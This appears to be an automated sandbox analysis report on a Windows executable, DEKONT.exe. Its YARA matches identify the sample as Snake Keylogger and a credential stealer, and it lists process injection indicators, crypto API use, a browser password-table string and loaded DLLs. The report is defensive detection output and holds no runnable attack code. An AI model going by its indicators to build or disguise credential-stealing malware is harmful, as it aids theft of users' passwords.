Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2C9A9	3_2_05B2C9A9
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B21980	3_2_05B21980
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2F980	3_2_05B2F980
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2C108	3_2_05B2C108
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2F973	3_2_05B2F973
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B21970	3_2_05B21970
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B210B0	3_2_05B210B0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2C0F7	3_2_05B2C0F7
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2F0D0	3_2_05B2F0D0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B210C0	3_2_05B210C0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2F0C0	3_2_05B2F0C0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2E820	3_2_05B2E820
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2E811	3_2_05B2E811
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B20006	3_2_05B20006
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B28008	3_2_05B28008
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B20040	3_2_05B20040
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2E3BB	3_2_05B2E3BB
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2E3C8	3_2_05B2E3C8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2DB09	3_2_05B2DB09
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2D268	3_2_05B2D268
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2D258	3_2_05B2D258
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEDAC0	3_2_06CEDAC0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEAEA8	3_2_06CEAEA8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE8A58	3_2_06CE8A58
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CECE28	3_2_06CECE28
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEC7D8	3_2_06CEC7D8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEBB38	3_2_06CEBB38
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEB4F0	3_2_06CEB4F0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE90A1	3_2_06CE90A1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEA858	3_2_06CEA858
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CED478	3_2_06CED478
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE7020	3_2_06CE7020
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE15F8	3_2_06CE15F8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEC188	3_2_06CEC188
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE5EC0	3_2_06CE5EC0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEAE98	3_2_06CEAE98
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEDABB	3_2_06CEDABB
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEDAB7	3_2_06CEDAB7
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE5EB1	3_2_06CE5EB1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE8A48	3_2_06CE8A48
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE5A58	3_2_06CE5A58
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE5A68	3_2_06CE5A68
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE8600	3_2_06CE8600
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CECE23	3_2_06CECE23
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE6BC8	3_2_06CE6BC8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEC7C9	3_2_06CEC7C9
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE37FB	3_2_06CE37FB
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE3B80	3_2_06CE3B80
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE6BB8	3_2_06CE6BB8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE6760	3_2_06CE6760
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE6770	3_2_06CE6770
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE6308	3_2_06CE6308
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE6318	3_2_06CE6318
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEBB27	3_2_06CEBB27
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE78E7	3_2_06CE78E7
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEB4E0	3_2_06CEB4E0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE08E1	3_2_06CE08E1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE78F8	3_2_06CE78F8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE08F0	3_2_06CE08F0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE0488	3_2_06CE0488
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE4880	3_2_06CE4880
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE0498	3_2_06CE0498
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE7490	3_2_06CE7490
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE74A0	3_2_06CE74A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEA848	3_2_06CEA848
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE0040	3_2_06CE0040
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE2C68	3_2_06CE2C68
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CED473	3_2_06CED473
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE3808	3_2_06CE3808
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE0006	3_2_06CE0006
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE7010	3_2_06CE7010
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE55D9	3_2_06CE55D9
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE55E8	3_2_06CE55E8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE85F1	3_2_06CE85F1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE819B	3_2_06CE819B
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE1191	3_2_06CE1191
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE81A8	3_2_06CE81A8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE11A0	3_2_06CE11A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE0D48	3_2_06CE0D48
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE7D40	3_2_06CE7D40
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE7D50	3_2_06CE7D50
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEC178	3_2_06CEC178
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE0D38	3_2_06CE0D38
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06D0FA32	3_2_06D0FA32
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06D0BFEC	3_2_06D0BFEC
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06D0DC48	3_2_06D0DC48

Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DEKONT.exe
Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DEKONT.exe
Source: DEKONT.exe, 00000000.00000002.1373034560.0000000003210000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DEKONT.exe
Source: DEKONT.exe, 00000000.00000002.1373381739.00000000034E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DEKONT.exe
Source: DEKONT.exe, 00000000.00000000.1356401634.000000000108C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameYaaO.exeL vs DEKONT.exe
Source: DEKONT.exe, 00000000.00000002.1372333783.000000000161E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DEKONT.exe
Source: DEKONT.exe, 00000003.00000002.3819949173.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DEKONT.exe
Source: DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DEKONT.exe
Source: DEKONT.exe	Binary or memory string: OriginalFilenameYaaO.exeL vs DEKONT.exe

Source: DEKONT.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: DEKONT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, -C.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, -C.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.cs	Security API names: _0020.AddAccessRule
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.cs	Security API names: _0020.AddAccessRule
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, gBrw0gPbXtcXH18PyW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, gBrw0gPbXtcXH18PyW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.DEKONT.exe.37ddc5c.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DEKONT.exe.3439f78.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DEKONT.exe.344a334.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DEKONT.exe.5b60000.12.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/3

Source: C:\Users\user\Desktop\DEKONT.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DEKONT.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Mutant created: NULL

Source: DEKONT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DEKONT.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\DEKONT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DEKONT.exe, 00000003.00000002.3822157482.0000000003228000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3824813845.0000000004060000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000326E000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003238000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003246000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000327A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DEKONT.exe	ReversingLabs: Detection: 44%
Source: DEKONT.exe	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"
Source: C:\Users\user\Desktop\DEKONT.exe	Process created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"
Source: C:\Users\user\Desktop\DEKONT.exe	Process created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: sspicli.dll	Jump to behavior
